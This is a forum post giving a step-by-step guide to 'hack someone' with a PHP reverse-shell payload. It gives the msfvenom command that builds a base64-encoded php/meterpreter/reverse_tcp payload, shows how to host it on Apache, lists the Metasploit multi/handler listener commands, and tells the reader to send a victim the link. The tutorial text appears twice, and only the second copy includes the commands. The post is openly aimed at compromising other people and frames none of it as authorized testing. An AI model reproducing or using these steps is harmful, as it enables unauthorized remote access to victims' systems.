How to hack someone using a PHP payload 09-30-2020, 03:04 PM
#1
So lets make payloads with php using msfvemon
What is msfvemon?? well metasploit framework venom is a payload gen used on Linunx to generate payloads for exploitation
Lets start by starting apache2 so open terminal and type
Step 1:
Now we need our local ip or external ip for local ip enterand for external google whats my ip
Note if using external link u need to forward the ports on your router
Step 2:
Now you have the local ip, so lets make the payload
Enter this command:
Step 3:
Now go to the Desktop and copy the payload to your html file in /var/ww w/html folder
Remove the space ^^
Step 4:
Now open a new terminal and type
Step 5:
Type these commands:
Step 6:
Now send the victum the link 192.168.8.107:4444/Home.php
Step 7:
Now type help and you get a full list commands you can run under metasploit 🙂
If anyone wants to leave room for improvement, you can do so
What is msfvemon?? well metasploit framework venom is a payload gen used on Linunx to generate payloads for exploitation
Lets start by starting apache2 so open terminal and type
Code:
service apache2 start
Step 1:
Now we need our local ip or external ip for local ip enter
Code:
ifconfig
Note if using external link u need to forward the ports on your router
Step 2:
Now you have the local ip, so lets make the payload
Enter this command:
Code:
msfvenom -p php/meterpreter/reverse_tcp LHOST= 192.168.8.107 LPORT=4444 -e php/base64 -f raw > /root/Desktop/Home.php
Step 3:
Now go to the Desktop and copy the payload to your html file in /var/ww w/html folder
Remove the space ^^
Step 4:
Now open a new terminal and type
Code:
msfconsole
Step 5:
Type these commands:
Code:
use exploit/multi/handler/
Code:
set payload php/meterpreter/reverse_tcp
Code:
set lhost [your local ip]
Code:
set lport 4444
Code:
exploit
Step 6:
Now send the victum the link 192.168.8.107:4444/Home.php
Step 7:
Now type help and you get a full list commands you can run under metasploit 🙂
If anyone wants to leave room for improvement, you can do so
